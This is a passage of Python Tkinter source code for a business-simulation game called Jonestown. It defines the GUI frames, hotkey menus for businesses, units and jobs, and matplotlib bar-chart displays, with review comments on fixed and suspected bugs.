            self.frames[page_name] = frame
            # stack frames in the same grid cell; raise_frame picks the top
            frame.grid(row=0, column=0, sticky="nsew")
        # Tutorial pages share the tutorial class and differ only in text.
        i = 0
        for page_name in ("main_display", "other_display"):
            frame = tutorial(parent=self, controller=self, root=root, text=tutorials[i])
            self.frames[page_name] = frame
            frame.grid(row=0, column=0, sticky="nsew")
            i += 1
        self.show_frame("main_display")

    def show_frame(self, page_name):
        """Raise the named page to the top of the stack."""
        frame = self.frames[page_name]
        frame.raise_frame()

    def update_frame(self, page_name, *args):
        """Update the named page with *args, then raise it."""
        frame = self.frames[page_name]
        frame.update_frame(*args)
        self.show_frame(page_name)

    def bar_chart(self, x, y, xlabel, ylabel, title):
        """Draw a bar chart on the matplotlib page and raise it."""
        self.frames["matplotlib_display"].bar_chart(x, y, xlabel, ylabel, title)
        self.show_frame("matplotlib_display")

    def display_lists(self, col1, col2=None, col3=None, col4=None):
        """Show up to four columns of values on the list page and raise it.

        Fixed: the previous implementation iterated the default None columns
        (TypeError) and discarded every string it built.  Mirror bar_chart by
        delegating to list_display, which already skips None columns.
        """
        self.frames["list_display"].display_lists(col1, col2, col3, col4)
        self.show_frame("list_display")
class tutorial(tk.Frame):
    """Static text page: a parchment-backed label flanked by wheat side bars."""

    def __init__(self, parent, controller, root, text):
        tk.Frame.__init__(self, parent)
        self.root = root
        leftBarImage = tk.PhotoImage(file="./images/greenWheat.gif")
        rightBarImage = tk.PhotoImage(file="./images/nightWheat.gif")
        parchment = tk.PhotoImage(file='./images/parchment.gif')
        leftBar = tk.Label(self, image=leftBarImage, width=150, height=510)
        # Keep references so the PhotoImages are not garbage collected.
        leftBar.image = leftBarImage
        self.mainScreen_var = tk.StringVar()
        # intro = """Welcome to Jonestown!
        # You have just inherited a small bakery from your beloved Uncle Bill.
        # Before he died you vowed to him that you would keep his business going.
        # He left the bakery well provisioned for the next few days, but you're
        # going to need to build a farm and a mill immediately if you plan on staying in
        # business.
        # Don't let Uncle Bill down!
        # """
        self.mainScreen_var.set(text)
        mainScreen = tk.Label(self, image=parchment, textvar=self.mainScreen_var, font=TEXT_FONT, width=800, height=500, borderwidth=5,
                              relief=tk.RIDGE, compound=tk.CENTER)
        mainScreen.image = parchment
        rightBar = tk.Label(self, image=rightBarImage, width=150, height=510)
        rightBar.image = rightBarImage
        leftBar.pack(side=tk.LEFT)
        mainScreen.pack(side=tk.LEFT, expand=True)
        rightBar.pack(side=tk.LEFT)

    def raise_frame(self):
        """Bring this page to the front of the display stack."""
        self.tkraise()

    # def employees(self, unitEmpDict):
    #     text = "Staff"
    #     for unit in unitEmpDict.keys():
    #         text += "\n\n" + unit.name + " employees:"
    #         for employee in unitEmpDict[unit]:
    #             if unitEmpDict[unit].index(employee) % 3 == 0:
    #                 text += "\n"
    #             text += employee.name + " (" + employee.job.jobType +") "
    #     self.mainScreen_var.set(text)
class matplotlib_display(tk.Frame):
    """Display page embedding a matplotlib Figure, used for bar charts."""

    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.root = root
        leftBarImage = tk.PhotoImage(file="./images/greenWheat.gif")
        rightBarImage = tk.PhotoImage(file="./images/nightWheat.gif")
        leftBar = tk.Label(self, image=leftBarImage, width=150, height=510)
        # Keep a reference so the PhotoImage is not garbage collected.
        leftBar.image = leftBarImage
        self.fig = Figure(figsize=(6, 5), dpi=100)
        self.canvas = FigureCanvasTkAgg(self.fig, self)
        # NOTE(review): FigureCanvasTkAgg.show() is deprecated/removed in
        # newer matplotlib (draw() replaces it) -- confirm the pinned version.
        self.canvas.show()
        graphScreen = self.canvas.get_tk_widget()
        rightBar = tk.Label(self, image=rightBarImage, width=150, height=510)
        rightBar.image = rightBarImage
        leftBar.pack(side=tk.LEFT)
        graphScreen.pack(side=tk.LEFT, expand=True)
        rightBar.pack(side=tk.LEFT)

    # x, y are arrays
    def bar_chart(self, x, y, xlabel, ylabel, title):
        """Clear the figure and draw one bar chart of y, labelled by x."""
        self.fig.clf()
        graph = self.fig.add_subplot(1, 1, 1)
        # Bars are drawn at integer positions, then relabelled with x's values.
        x_fill = [i for i in range(len(x))]
        graph.bar(x_fill, y)
        graph.set_title(title)
        graph.set_xlabel(xlabel)
        graph.set_ylabel(ylabel)
        graph.set_xticks(range(len(x)))
        graph.set_xticklabels(x)

    def raise_frame(self):
        """Redraw the canvas and bring this page to the front."""
        self.canvas.show()
        self.tkraise()
class list_display(tk.Frame):
    """Display page showing up to four titled text columns on parchment."""

    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.root = root
        leftBarImage = tk.PhotoImage(file="./images/greenWheat.gif")
        rightBarImage = tk.PhotoImage(file="./images/nightWheat.gif")
        parchment = tk.PhotoImage(file='./images/parchment.gif')
        leftBar = tk.Label(self, image=leftBarImage, width=150, height=500)
        # Keep references so the PhotoImages are not garbage collected.
        leftBar.image = leftBarImage
        self.col1_var = tk.StringVar()
        self.col2_var = tk.StringVar()
        self.col3_var = tk.StringVar()
        self.col4_var = tk.StringVar()
        title1 = tk.Label(self, image=parchment, text="Test", font=TITLE_FONT, width=190, height=30, borderwidth=5,
                          relief=tk.RIDGE, compound=tk.CENTER)
        title2 = tk.Label(self, image=parchment, text="Test", font=TITLE_FONT, width=190, height=30, borderwidth=5,
                          relief=tk.RIDGE, compound=tk.CENTER)
        title3 = tk.Label(self, image=parchment, text="Test", font=TITLE_FONT, width=190, height=30, borderwidth=5,
                          relief=tk.RIDGE, compound=tk.CENTER)
        title4 = tk.Label(self, image=parchment, text="Test", font=TITLE_FONT, width=190, height=30, borderwidth=5,
                          relief=tk.RIDGE, compound=tk.CENTER)
        col1 = tk.Label(self, image=parchment, textvar=self.col1_var, font=TEXT_FONT, width=190, height=450, borderwidth=5,
                        relief=tk.RIDGE, compound=tk.CENTER)
        col2 = tk.Label(self, image=parchment, textvar=self.col2_var, font=TEXT_FONT, width=190, height=450, borderwidth=5,
                        relief=tk.RIDGE, compound=tk.CENTER)
        col3 = tk.Label(self, image=parchment, textvar=self.col3_var, font=TEXT_FONT, width=190, height=450, borderwidth=5,
                        relief=tk.RIDGE, compound=tk.CENTER)
        col4 = tk.Label(self, image=parchment, textvar=self.col4_var, font=TEXT_FONT, width=190, height=450, borderwidth=5,
                        relief=tk.RIDGE, compound=tk.CENTER)
        # NOTE(review): only col1 keeps an explicit image reference; the shared
        # parchment PhotoImage survives through it, so the other labels render.
        col1.image = parchment
        rightBar = tk.Label(self, image=rightBarImage, width=150, height=500)
        rightBar.image = rightBarImage
        leftBar.grid(row=0, column=0, rowspan=2)
        title1.grid(row=0, column=1)
        title2.grid(row=0, column=2)
        title3.grid(row=0, column=3)
        title4.grid(row=0, column=4)
        col1.grid(row=1, column=1)
        col2.grid(row=1, column=2)
        col3.grid(row=1, column=3)
        col4.grid(row=1, column=4)
        rightBar.grid(row=0, column=5, rowspan=2)

    def raise_frame(self):
        """Bring this page to the front.

        NOTE(review): repopulates the columns with hard-coded demo data on
        every raise -- presumably leftover scaffolding; confirm.
        """
        self.tkraise()
        self.display_lists(["hello", "world", "I", "see", "you"], [1, 2, 3, 43, 4], ["So", "here", "we", "are"])

    def display_lists(self, col1, col2=None, col3=None, col4=None):
        """Render each provided list into its column; None columns are skipped."""
        lists = [col1, col2, col3, col4]
        titles = []
        columns = [self.col1_var, self.col2_var, self.col3_var, self.col4_var]
        for i in range(len(lists)):
            if lists[i] is not None:
                string = ""
                for item in lists[i]:
                    string += "\n" + str(item)
                columns[i].set(string)
#printout
class text_output(tk.Frame):
    """Message log frame: a single Text widget that game events are printed to."""

    def __init__(self, parent, root, *args, **kwargs):
        tk.Frame.__init__(self, master=parent, *args, **kwargs)
        self.root = root
        log = tk.Text(self, background="gray", state='normal', font=TEXT_FONT, width=159, height=20)
        log.grid(row=0, column=0, sticky='nsew')
        self.text = log
        self.out("Welcome to Jonestown!")

    def out(self, text):
        """Write text at the current insertion point of the log."""
        self.text.insert(tk.INSERT, text)

    def clear(self):
        """Wipe the entire log."""
        self.text.delete(1.0, tk.END)
#static_data
class static_data(tk.Frame):
    """Right-hand panel showing the character's name, age, town and net worth."""

    def __init__(self, parent, root, *args, **kwargs):
        tk.Frame.__init__(self, master=parent, *args, **kwargs)
        self.root = root
        self.charName = tk.StringVar()
        self.age = tk.StringVar()
        self.locality = tk.StringVar()
        # self.marriage = tk.StringVar()
        # NOTE(review): declared as IntVar but update_frame assigns a formatted
        # string -- confirm whether StringVar was intended.
        self.netWorth = tk.IntVar()
        header = tk.Label(self, text='Jonestown', font=TITLE_FONT)
        nameLabel = tk.Label(self, textvariable=self.charName, anchor='w', font=TEXT_FONT)
        ageLabel = tk.Label(self, textvariable=self.age, anchor='w', font=TEXT_FONT)
        localityLabel = tk.Label(self, textvariable=self.locality, anchor='w', font=TEXT_FONT)
        # marriageLabel = tk.Label(self, textvariable=self.marriage)
        netWorthLabel = tk.Label(self, textvariable=self.netWorth, anchor='w', font=TEXT_FONT)
        # Refresh whenever any frame fires the virtual <<refresh>> event.
        self.root.bind("<<refresh>>", self.update_frame)
        self.update_frame()
        self.set_hotkeys()
        header.pack(fill=tk.X)
        nameLabel.pack(fill=tk.X)
        ageLabel.pack(fill=tk.X)
        localityLabel.pack(fill=tk.X)
        # marriageLabel.pack(fill=tk.X)
        netWorthLabel.pack(fill=tk.X)

    def update_frame(self, event=None):
        """Re-read the character's stats into the displayed variables."""
        char = self.root.getChar()
        self.charName.set(char.getName())
        self.age.set("You are " + str(char.getAge()) + " years old.")
        self.locality.set("You live in the town of " + char.getLocality().getName() + ".")
        #should account for property
        self.netWorth.set("Net worth: $" + str(char.getCapital()))

    def set_hotkeys(self):
        # This panel binds no hotkeys; present for interface symmetry with
        # the keyboard frames.
        pass
#controller for which keyboard
class key_controller(tk.Frame):
    """Right-hand menu area: stacks every keyboard frame and switches between
    them.  Also hosts helpers shared by the keyboards: selection accessors,
    integer entry validation, order/transfer callback factories and the
    chart-display shortcuts.
    """

    def __init__(self, parent, root, *args, **kwargs):
        tk.Frame.__init__(self, master=parent, *args, **kwargs)
        self.root = root
        self.root.event_generate("<<refresh>>", when="tail")
        self.grid_rowconfigure(0, weight=1)
        self.grid_columnconfigure(0, weight=1)
        self.grid()
        self.frames = {}
        # Instantiate every keyboard once; they all share one grid cell and
        # raise_frame() brings the active one to the top.
        for keyboard in (main_keyboard,
                         new_business, businessData,
                         new_unit, unitData,
                         new_job, jobData,
                         ordersMenu, new_order,
                         market, new_transfer,
                         house, town):
            page_name = keyboard.__name__
            frame = keyboard(parent=self, controller=self, root=root)
            self.frames[page_name] = frame
            #stack frames
            frame.grid(row=0, column=0, sticky="nsew")
        self.show_frame("main_keyboard")

    def show_frame(self, page_name, *args):
        """Raise the named keyboard, forwarding *args to its raise_frame."""
        frame = self.frames[page_name]
        frame.raise_frame(*args)

    def get_display_cont(self):
        """Return the gui's display controller."""
        return self.root.get_display_cont()

    def get_text_cont(self):
        """Return the gui's text log controller."""
        return self.root.get_text_cont()

    def get_business(self):
        """Return the business currently selected in the businessData frame."""
        return self.frames["businessData"].business

    def get_unit(self):
        """Return the unit currently selected in the unitData frame."""
        return self.frames["unitData"].unit

    def get_job(self):
        """Return the job currently selected in the jobData frame."""
        return self.frames["jobData"].job

    def isInt(self, P):
        """Tk entry validator: True if P can be part of an integer.

        The '0' prefix makes the empty string validate, so the user can
        clear the field while typing.
        """
        isInt = False
        try:
            int('0' + P)
            isInt = True
        except ValueError:
            isInt = False
        return isInt

    def create_order(self, order_var, amount_var):
        """Return a button callback that creates a craft order for the
        selected job from the given Tk variables."""
        def callback():
            import orders as o
            business = self.get_business()
            job = self.get_job()
            materialIndex = d.getMaterials().index(order_var.get())
            order = business.craftOrderManager(job, materialIndex)
            order.setAmount(int(amount_var.get()))
            self.root.event_generate("<<refresh>>", when="tail")
        return callback

    def set_order_amount(self, order, amountVar):
        """Return a callback that updates an existing order's amount."""
        def callback():
            order.setAmount(int(amountVar.get()))
        return callback

    def create_transfer(self, order_var, amount_var):
        """Return a callback that creates a transfer order to the selected unit."""
        def callback():
            import orders as o
            business = self.get_business()
            # assumes the unit's first job acts as its manager -- TODO confirm
            manager = self.get_unit().getJobList()[0]
            materialIndex = d.getMaterials().index(order_var.get())
            transfer = business.transferOrderManager(manager, self.get_unit(), materialIndex)
            transfer.setAmount(int(amount_var.get()))
            self.root.event_generate("<<refresh>>", when="tail")
        return callback

    def show_production(self, entity):
        """Bar-chart the entity's production counts on the main display."""
        display_cont = self.root.get_display_cont()
        xy = entity.getProduction()
        # xy[0] holds material indices, xy[1] the crafted amounts.
        products = [d.getMaterials()[xy[0][i]] for i in range(len(xy[0]))]
        display_cont.bar_chart(products, xy[1], "Products", "Crafted", entity.name + " Production")

    def show_employees(self, entity):
        """Bar-chart the entity's employee counts per group."""
        display_cont = self.root.get_display_cont()
        empDict = entity.get_emp_dict()
        x = []
        y = []
        for key in list(empDict.keys()):
            x.append(key.name)
            y.append(len(empDict[key]))
        display_cont.bar_chart(x, y, "Employment", "Employees", entity.name + " Staff")

    def show_stock(self, entity):
        """Bar-chart the entity's stock of every material."""
        display_cont = self.root.get_display_cont()
        x = d.getMaterials()
        y = entity.getAllStock()
        display_cont.bar_chart(x, y, "Materials", "Amount", entity.name + " Stock")
class main_keyboard(tk.Frame):
    """Root menu: house/town/new-business plus one numbered button per business."""

    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.hotkeys = ["h", "t", "n"]
        self.dynamic_buttons = []
        header = tk.Label(self, text="Office", font=TITLE_FONT)
        house = tk.Button(self, text="h. House", font=BUTTON_FONT, command=lambda: controller.show_frame("house"))
        town = tk.Button(self, text="t. Town", font=BUTTON_FONT, command=lambda: controller.show_frame("town"))
        new_bus = tk.Button(self, text="n. New Business", font=BUTTON_FONT, command=lambda: controller.show_frame("new_business"))
        header.pack(fill=tk.X)
        house.pack(fill=tk.X)
        town.pack(fill=tk.X)
        new_bus.pack(fill=tk.X)

    def callback_factory(self, business):
        """Bind `business` now, avoiding the late-binding closure bug in loops."""
        def callback(event=None):
            self.controller.show_frame("businessData", business)
        return callback

    def raise_frame(self):
        """Rebuild one numbered button per business, rebind hotkeys, raise."""
        for button in self.dynamic_buttons:
            button.destroy()
        # Fixed: destroyed buttons previously stayed in the list, so
        # set_hotkeys kept rebinding their stale callbacks on every raise.
        self.dynamic_buttons = []
        char = self.root.getChar()
        businesses = char.getBusinesses()
        key = 1
        for business in businesses:
            busi_name = business.getName()
            callback = self.callback_factory(business)
            # Fixed: the label previously interpolated str(callback) (the
            # function's repr) instead of the hotkey number.
            newButton = tk.Button(self, text=str(key) + ". " + busi_name, font=BUTTON_FONT, command=callback)
            newButton.callback = callback
            newButton.pack(fill=tk.X)
            self.dynamic_buttons.append(newButton)
            key += 1
        self.set_hotkeys()
        self.tkraise()

    def set_hotkeys(self):
        """Unbind the previous keyboard's hotkeys and install this one's."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        self.root.bind("h", lambda x: self.controller.show_frame("house"))
        self.root.bind("t", lambda x: self.controller.show_frame("town"))
        self.root.bind("n", lambda x: self.controller.show_frame("new_business"))
        key = 1
        for button in self.dynamic_buttons:
            self.root.bind(str(key), button.callback)
            self.root.dynamic_hotkeys.append(str(key))
            key += 1
class new_business(tk.Frame):
    """Form for creating a new business (name + starting cash)."""

    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.hotkeys = ["<Return>", "<Escape>"]
        header = tk.Label(self, text="Create a New Business", font=TITLE_FONT)
        enter_name = tk.Label(self, text="Enter name:", font=TEXT_FONT)
        self.business_name = tk.StringVar()
        self.name = tk.Entry(self, textvariable=self.business_name)
        cash = tk.Label(self, text="Starting cash:", font=TEXT_FONT)
        self.amountVar = tk.StringVar()
        # Restrict the cash entry to integer input via per-keystroke validation.
        vcmd = (self.register(self.controller.isInt), '%P')
        amount = tk.Entry(self, validatecommand=vcmd, validate="key", textvariable=self.amountVar)
        ok = tk.Button(self, text="[enter]", font=BUTTON_FONT, command=self.create_business)
        esc = tk.Button(self, text="[esc] Return to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
        header.pack()
        enter_name.pack()
        self.name.pack()
        cash.pack()
        amount.pack()
        ok.pack()
        esc.pack(fill=tk.X)

    def raise_frame(self):
        """Rebind hotkeys, raise the form, and focus the name entry."""
        self.set_hotkeys()
        self.tkraise()
        self.name.focus()

    def set_hotkeys(self):
        """Swap the root's active hotkeys for this frame's."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        self.root.bind("<Return>", lambda event: self.create_business())
        self.root.bind("<Escape>", lambda event: self.controller.show_frame("main_keyboard"))

    def create_business(self):
        """Create the business from the form fields and report the result."""
        busiName = self.business_name.get()
        # The '0' prefix tolerates an empty cash field.
        busiCash = int("0" + self.amountVar.get())
        new_bus = self.root.char.startBusiness(busiName, busiCash)
        if new_bus is not None:
            self.root.out("\n" + busiName + " created!")
        else:
            self.root.out("\nYou don't have enough money..")
        # NOTE(review): the name field shows "Done!" even on failure -- confirm.
        self.business_name.set("Done!")
        self.root.event_generate("<<refresh>>", when="tail")
class businessData(tk.Frame):
    """Per-business menu: production/employees charts, unit list, new unit."""

    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.dynamic_buttons = []
        self.hotkeys = ["u", "p", "e", "n", "<Escape>"]
        self.business = None
        self.busiName = tk.StringVar()
        self.busiName.set("nothing")
        header = tk.Label(self, textvariable=self.busiName, font=TITLE_FONT)
        production = tk.Button(self, text="[p] Production", font=BUTTON_FONT, command=lambda: controller.show_production(self.business))
        employees = tk.Button(self, text="[e] Employees", font=BUTTON_FONT, command=lambda: controller.show_employees(self.business))
        # Fixed: previously referenced the undefined name `business`
        # (NameError when clicked).
        new_unit = tk.Button(self, text="[n] New Unit", font=BUTTON_FONT, command=lambda: controller.show_frame("new_unit", self.business))
        # Fixed: Tk invokes button commands with no arguments, so a callback
        # that doubles as a key binding needs a default for `event`.
        callback = lambda event=None: self.controller.show_frame("main_keyboard")
        self.esc = tk.Button(self, text="[esc] Return to Office", font=BUTTON_FONT, command=callback)
        self.esc.callback = callback
        header.pack(fill=tk.X)
        production.pack(fill=tk.X)
        employees.pack(fill=tk.X)
        new_unit.pack(fill=tk.X)
        self.esc.pack(fill=tk.X)

    def setBusiness(self, business):
        """Select the business this frame displays."""
        self.business = business
        self.busiName.set(business.getName())

    def _unit_callback(self, business, unit):
        """Bind loop variables now, avoiding the late-binding closure bug."""
        def callback(event=None):
            self.controller.show_frame("unitData", business, unit)
        return callback

    def raise_frame(self, business):
        """Rebuild one numbered button per unit of `business` and raise."""
        for button in self.dynamic_buttons:
            button.destroy()
        # Fixed: destroyed buttons previously stayed listed, so set_hotkeys
        # kept rebinding their stale callbacks.
        self.dynamic_buttons = []
        self.setBusiness(business)
        char = self.root.getChar()
        units = business.getUnits()
        key = 1
        for unit in units:
            unit_name = unit.getName()
            # Fixed: the old lambda captured `unit` late (every button opened
            # the last unit) and required an `event` argument Tk never passes
            # to button commands.
            callback = self._unit_callback(business, unit)
            newButton = tk.Button(self, text=str(key) + ". " + unit_name, font=BUTTON_FONT, command=callback)
            newButton.callback = callback
            newButton.pack(fill=tk.X)
            self.dynamic_buttons.append(newButton)
            key += 1
        self.esc.pack_forget()
        self.esc.pack(fill=tk.X)
        self.set_hotkeys()
        self.tkraise()

    def set_hotkeys(self):
        """Swap the root's active hotkeys for this frame's."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        # NOTE(review): "unitMenu" is not a registered frame; pressing "u"
        # raises KeyError -- confirm the intended target.
        self.root.bind("u", lambda event: self.controller.show_frame("unitMenu"))
        self.root.bind("p", lambda event: self.controller.show_production(self.business))
        self.root.bind("e", lambda event: self.controller.show_employees(self.business))
        self.root.bind("n", lambda event: self.controller.show_frame("new_unit", self.business))
        self.root.bind("<Escape>", lambda event: self.controller.show_frame("main_keyboard"))
        key = 1
        for button in self.dynamic_buttons:
            self.root.bind(str(key), button.callback)
            self.root.dynamic_hotkeys.append(str(key))
            key += 1
class new_unit(tk.Frame):
    """Form for creating a new unit (type + name) inside a business."""

    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.dynamic_buttons = []
        self.hotkeys = ["<Return>", "<Escape>"]
        self.business = None
        header = tk.Label(self, text="New Unit", font=TITLE_FONT)
        unit_label = tk.Label(self, text="Choose a Unit type:", font=TEXT_FONT)
        self.unit_var = tk.StringVar()
        self.unit_name = tk.StringVar()
        unit_list = self.get_units()
        units = tk.OptionMenu(self, self.unit_var, *unit_list)
        name_label = tk.Label(self, text="Name your new Unit:", font=TEXT_FONT)
        self.name = tk.Entry(self, textvariable=self.unit_name)
        ok = tk.Button(self, text="[enter]", font=BUTTON_FONT, command=self.create_unit)
        # Fixed: the old command referenced the undefined name `business`
        # (NameError on click) and required an `event` argument.  raise_frame()
        # always replaces this button with one targeting the real business,
        # so fall back to the main office until then.
        callback = lambda event=None: self.controller.show_frame("main_keyboard")
        self.esc = tk.Button(self, text="[esc] Return to Business", font=BUTTON_FONT, command=callback)
        self.esc.callback = callback
        header.pack()
        unit_label.pack()
        units.pack()
        name_label.pack()
        self.name.pack()
        ok.pack()
        self.esc.pack()

    def raise_frame(self, business):
        """Point the escape button at `business`, rebind hotkeys, and raise."""
        self.esc.destroy()
        # event=None lets the same callable serve as button command and key binding.
        callback = lambda event=None: self.controller.show_frame("businessData", business)
        self.esc = tk.Button(self, text="[esc] Return to Business", font=BUTTON_FONT, command=callback)
        self.esc.callback = callback
        self.esc.pack(fill=tk.X)
        self.set_hotkeys()
        self.tkraise()
        self.name.focus()

    def set_hotkeys(self):
        """Swap the root's active hotkeys for this frame's."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        self.name.bind("<Return>", lambda x: self.create_unit())
        self.root.bind("<Escape>", self.esc.callback)

    def get_units(self):
        """Return the unitType names of every available unit class."""
        from unit import all_units
        unit_list = []
        for unit in all_units():
            unit_list.append(unit.unitType)
        return unit_list

    def create_unit(self):
        """Instantiate the selected unit type in the current business."""
        from unit import all_units
        unitType = self.unit_var.get()
        for unit in all_units():
            if unit.unitType == unitType:
                break
        else:
            # Fixed: previously fell through and built the *last* unit type
            # when nothing matched (e.g. no selection made yet).
            return
        name = self.unit_name.get()
        business = self.controller.get_business()
        locality = business.locality
        location = locality.find_property()
        new_unit = unit(name, locality, location, business)
        # NOTE(review): this shows the unit object's repr in the entry --
        # presumably a status message was intended; confirm.
        self.unit_name.set(new_unit)
        self.root.event_generate("<<refresh>>", when="tail")
class unitData(tk.Frame):
    """Per-unit menu: production/employees charts, market, job list, new job."""

    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.dynamic_buttons = []
        # Fixed: "n" was bound in set_hotkeys but never tracked here, so the
        # next keyboard could not unbind it.
        self.hotkeys = ["p", "e", "m", "n", "<Escape>"]
        self.business = None
        self.unit = None
        self.unitName = tk.StringVar()
        self.unitName.set("nothing")
        header = tk.Label(self, textvariable=self.unitName, font=TITLE_FONT)
        production = tk.Button(self, text="[p] Production", font=BUTTON_FONT, command=lambda: controller.show_production(self.unit))
        employees = tk.Button(self, text="[e] Employees", font=BUTTON_FONT, command=lambda: controller.show_employees(self.unit))
        market = tk.Button(self, text="[m] Market", font=BUTTON_FONT, command=lambda: controller.show_frame("market", self.business, self.unit))
        new_job = tk.Button(self, text="[n] New job", font=BUTTON_FONT, command=lambda: controller.show_frame("new_job", self.business, self.unit))
        # Fixed: button commands are invoked with no arguments, so the shared
        # callback needs a default for `event`.
        callback = lambda event=None: self.controller.show_frame("businessData", self.business)
        self.esc = tk.Button(self, text="[esc] Return to Business", font=BUTTON_FONT, command=callback)
        self.esc.callback = callback
        header.pack(fill=tk.X)
        production.pack(fill=tk.X)
        employees.pack(fill=tk.X)
        market.pack(fill=tk.X)
        new_job.pack(fill=tk.X)
        self.esc.pack(fill=tk.X)

    def setUnit(self, unit):
        """Select the unit this frame displays."""
        self.unit = unit
        self.unitName.set(unit.getName())

    def _job_callback(self, job):
        """Bind `job` now, avoiding the late-binding closure bug in loops."""
        def callback(event=None):
            # jobData.raise_frame accepts only the job (it reads business and
            # unit via the controller accessors).
            self.controller.show_frame("jobData", job)
        return callback

    def raise_frame(self, business, unit):
        """Rebuild one numbered button per job of `unit` and raise."""
        for button in self.dynamic_buttons:
            button.destroy()
        # Fixed: destroyed buttons previously stayed listed, so set_hotkeys
        # kept rebinding their stale callbacks.
        self.dynamic_buttons = []
        self.esc.destroy()
        self.business = business
        self.setUnit(unit)
        char = self.root.getChar()
        jobs = unit.getJobList()
        key = 1
        for job in jobs:
            job_name = job.jobType
            # Fixed: the old lambda captured `job` late (every button opened
            # the last job), required an `event` argument, and passed
            # business/unit to a raise_frame that only takes a job.
            callback = self._job_callback(job)
            newButton = tk.Button(self, text=str(key) + ". " + job_name, font=BUTTON_FONT, command=callback)
            newButton.callback = callback
            newButton.pack(fill=tk.X)
            self.dynamic_buttons.append(newButton)
            key += 1
        callback = lambda event=None: self.controller.show_frame("businessData", business)
        self.esc = tk.Button(self, text="[esc] Return to Business", font=BUTTON_FONT, command=callback)
        self.esc.callback = callback
        self.esc.pack(fill=tk.X)
        self.set_hotkeys()
        self.tkraise()

    def set_hotkeys(self):
        """Swap the root's active hotkeys for this frame's."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        # self.root.bind("j", lambda x: self.controller.show_frame("jobsMenu"))
        self.root.bind("p", lambda event: self.controller.show_production(self.unit))
        self.root.bind("e", lambda event: self.controller.show_employees(self.unit))
        # Fixed: hotkeys now pass the same arguments as the matching buttons;
        # market/new_job raise_frames require (business, unit).
        self.root.bind("m", lambda event: self.controller.show_frame("market", self.business, self.unit))
        self.root.bind("n", lambda event: self.controller.show_frame("new_job", self.business, self.unit))
        self.root.bind("<Escape>", self.esc.callback)
        key = 1
        for button in self.dynamic_buttons:
            self.root.bind(str(key), button.callback)
            self.root.dynamic_hotkeys.append(str(key))
            key += 1
# class jobsMenu(tk.Frame):
# def __init__(self, parent, controller, root):
# tk.Frame.__init__(self, parent)
# self.controller = controller
# self.root = root
# self.hotkeys = ["n", "<BackSpace>", "<Escape>"]
# self.dynamic_buttons = []
# header = tk.Label(self, text="Jobs", font=TITLE_FONT)
# new_job = tk.Button(self, text="n. New job", font=BUTTON_FONT, command=lambda: controller.show_frame("new_job"))
# self.back = tk.Button(self, text="bsp. Back", font=BUTTON_FONT, command=lambda: controller.show_frame("unitData"))
# self.main = tk.Button(self, text="esc. Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
# header.pack()
# new_job.pack(fill=tk.X)
# self.main.pack(fill=tk.X)
# def callbackFactory(self, job):
# def callback(event=None):
# return self.controller.show_frame("jobData", job)
# return callback
# def raise_frame(self):
# for button in self.dynamic_buttons:
# button.destroy()
# char = self.root.getChar()
# unit = self.controller.get_unit()
# jobs = unit.getJobList()
# key = 1
# for job in jobs:
# job_name = job.jobType
# callback = self.callbackFactory(job)
# newButton = tk.Button(self, text=str(key) + ". " + job_name, font=BUTTON_FONT, command=callback)
# newButton.callback = callback
# newButton.pack(fill=tk.X)
# self.dynamic_buttons.append(newButton)
# key += 1
# self.back.pack_forget()
# self.main.pack_forget()
# self.back.pack(fill=tk.X)
# self.main.pack(fill=tk.X)
# self.set_hotkeys()
# self.tkraise()
# def set_hotkeys(self):
# for hotkey in self.root.hotkeys:
# self.root.unbind(hotkey)
# for hotkey in self.root.dynamic_hotkeys:
# self.root.unbind(hotkey)
# self.root.dynamic_hotkeys = []
# self.root.hotkeys = self.hotkeys
# self.root.bind("n", lambda x: self.controller.show_frame("new_job"))
# self.root.bind("<BackSpace>", lambda x: self.controller.show_frame("unitData"))
# self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
# key = 1
# for button in self.dynamic_buttons:
# self.root.bind(str(key), button.callback)
# self.root.dynamic_hotkeys.append(str(key))
# key += 1
class new_job(tk.Frame):
    """Form for adding a job of a chosen type to the current unit."""

    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.hotkeys = ["<Return>", "<Escape>"]
        header = tk.Label(self, text="New Job", font=TITLE_FONT)
        self.job_var = tk.StringVar()
        job_list = self.get_jobs()
        jobs = tk.OptionMenu(self, self.job_var, *job_list)
        ok = tk.Button(self, text="[enter]", font=BUTTON_FONT, command=self.create_job)
        # Fixed: the old command referenced the undefined name `unit`
        # (NameError on click).  raise_frame() always replaces this button
        # with one targeting the real unit, so fall back to the main office
        # until then.
        callback = lambda event=None: self.controller.show_frame("main_keyboard")
        self.esc = tk.Button(self, text="[esc] Return to Unit", font=BUTTON_FONT, command=callback)
